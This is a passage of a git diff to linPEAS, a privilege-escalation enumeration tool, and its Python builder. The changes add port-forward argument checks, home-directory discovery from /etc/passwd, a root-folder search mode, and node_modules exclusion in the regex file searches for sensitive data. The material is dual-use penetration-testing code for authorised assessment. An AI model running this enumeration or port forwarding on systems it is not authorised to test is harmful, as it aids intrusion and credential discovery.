LOCAL_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 2)" + REMOTE_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 3)" + REMOTE_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 4)" + + if ! [ "$LOCAL_IP" ] || ! [ "$LOCAL_PORT" ] || ! [ "$REMOTE_IP" ] || ! [ "$REMOTE_PORT" ]; then + printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; + exit 0 + fi + + #Check if LOCAL_PORT is a number + if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then + printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; + fi + + #Check if REMOTE_PORT is a number + if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then + printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; + fi + + port_forward "$LOCAL_IP" "$LOCAL_PORT" "$REMOTE_IP" "$REMOTE_PORT" + exit 0 +fi + #Get HOMESEARCH -HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")" -if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder - HOMESEARCH="$HOME $HOMESEARCH" +if [ "$SEARCH_IN_FOLDER" ]; then + HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/" +else + HOMESEARCH="/home/ /Users/ /root/ /var/www $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users|^/var/www" | tr "\n" " ")" + if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users|^/var/www"; then #If not listed and not in /home, /Users/, /root, or /var/www add current home folder + HOMESEARCH="$HOME $HOMESEARCH" + fi fi GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 9dadd24..9954731 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -173,11 +173,11 @@ class LinpeasBuilder: if type == "d": find_line += "-type d " - bash_find_var = f"FIND_DIR_{r[1:].replace('.','').replace('-','_').upper()}" + bash_find_var = f"FIND_DIR_{r[1:].replace('.','').replace('-','_').replace('{ROOT_FOLDER}','').upper()}" self.bash_find_d_vars.add(bash_find_var) all_folder_regexes += regexes else: - bash_find_var = f"FIND_{r[1:].replace('.','').replace('-','_').upper()}" + bash_find_var = f"FIND_{r[1:].replace('.','').replace('-','_').replace('{ROOT_FOLDER}','').upper()}" self.bash_find_f_vars.add(bash_find_var) all_file_regexes += regexes @@ -275,7 +275,7 @@ class LinpeasBuilder: analise_line = "" if init: analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; ' - analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,'+real_regex+',${SED_RED},"; ' + analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,'+real_regex+',${SED_RED},"; ' #If just list, just list the file/directory if frecord.just_list_file: @@ -393,13 +393,13 @@ class LinpeasBuilder: # If custom folder to search in regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n' - regexes_search_section += " timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" + regexes_search_section += " timeout 120 find \"$ROOT_FOLDER\" -type f -not -path \"*/node_modules/*\" -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" # If search in all the file system regexes_search_section += 'else\n' for path in paths_to_search: grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE" - regexes_search_section += " timeout 120 find "+path+" -type f -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" + regexes_search_section += " timeout 120 find "+path+" -type f -not -path \"*/node_modules/*\" -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" regexes_search_section += 'fi\n' regexes_search_section += "wait\n"